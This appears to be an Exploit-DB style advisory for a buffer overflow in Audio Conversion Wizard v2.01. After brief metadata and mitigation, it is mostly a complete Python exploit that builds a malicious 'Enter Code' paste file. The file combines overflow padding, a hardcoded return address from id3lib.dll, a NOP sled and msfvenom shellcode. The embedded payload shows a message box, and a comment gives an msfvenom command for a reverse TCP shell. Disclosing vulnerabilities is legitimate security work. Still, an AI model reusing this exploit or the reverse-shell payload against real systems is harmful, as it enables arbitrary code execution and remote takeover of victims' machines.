Vendor: Audio Conversion Wizard
By: Hejap Zairy
CVSS: 9.8 (CRITICAL)
CWE: 119 (Buffer Overflow)
Product Name: Audio Conversion Wizard
Affected Version From: v2.01
Affected Version To: v2.01
Patch Exists: YES
CPE: a:litexmedia:audio_conversion_wizard
Platforms Tested: Windows 10 64bit
2022

Audio Conversion Wizard v2.01 – Buffer Overflow

Audio Conversion Wizard v2.01 is vulnerable to a buffer overflow. An attacker can exploit it by running a Python script to generate a malicious file, copying the file's contents to the clipboard, opening Audio Conversion Wizard, pasting the contents into the 'Enter Code' field, and clicking 'OK'. This leads to arbitrary code execution.

Mitigation:

Update to the latest version of Audio Conversion Wizard.

Exploit-DB raw data:

# Exploit Title: Audio Conversion Wizard v2.01 - Buffer Overflow 
# Exploit Author: Hejap Zairy
# Date: 03.07.2022
# Software Link:   https://www.litexmedia.com/acwizard.exe
# Tested Version: v2.01
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author  Code By Hejap Zairy
#!/usr/bin/env python

from pwn import *

buffer = "\x41" * 1016 
push_esp  =  p32(0x1004dbff) #push esp ret ret from  id3lib.dll
nops =  "\x90" * 15#515 tshhh theardlooo love Malware 
#msfvenom   --arch x64  windows/x64/shell_reverse_tcp  lhost=ip lport=443      -f python -e x64/shikata_ga_nai  -b "\x00\x0a\x0d\x20"  
#msfvenom  --arch x64  -p windows/x64/messagebox   TEXT="0day Hejap Zairy"  -f python -e x64/shikata_ga_nai  EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf =  b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer  + push_esp + nops + buf + padding
try:
    with open("0day_Hejap.txt","wb") as f:
        print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
        f.write(payload)
        f.close()
        print("[+] File created!")
except:
    print("[-]File cannot be created")